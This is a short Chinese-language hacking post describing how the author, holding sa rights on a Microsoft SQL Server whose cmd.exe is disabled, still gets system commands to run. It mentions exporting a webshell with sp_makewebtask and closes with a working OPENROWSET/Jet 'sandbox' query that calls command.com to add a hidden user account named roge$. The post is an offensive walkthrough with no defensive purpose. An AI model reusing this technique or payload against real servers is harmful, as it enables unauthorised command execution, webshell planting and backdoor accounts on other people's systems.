sa权限cmd执行返回命令行提示已关闭的解决办法

sa权限，用xp_cmdshell执行cmd但是返回命令行提示已关闭

然后又试了试其他存储OA，job，沙盒什么的全部玩了一圈下来，照样不能执行命令,很无奈啊，遇见个变态sa

试试了sp_makewebtask存储，还好能导出了个webshell

进去看看情况到底咋回事

连上sql 执行命令时突然想起穿山甲的4个存储过程执行命令都调用了CMD

cmd被禁用了，当然没得玩了

传了个cmd上去试试一样的不能执行

想了想用其他大杀器试试提权，cmd禁用了也没得玩了

在system32翻了翻，发现command.com也能执行命令，基本跟cmd差不多，但不太清楚这算不算命令提示符

在本机试了试，禁用了cmd，发现command.com正常运行。哈哈

果断调用沙盒用command.com执行

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("command.com /c  net1 user roge$ /add")')

net user 看了看成功执行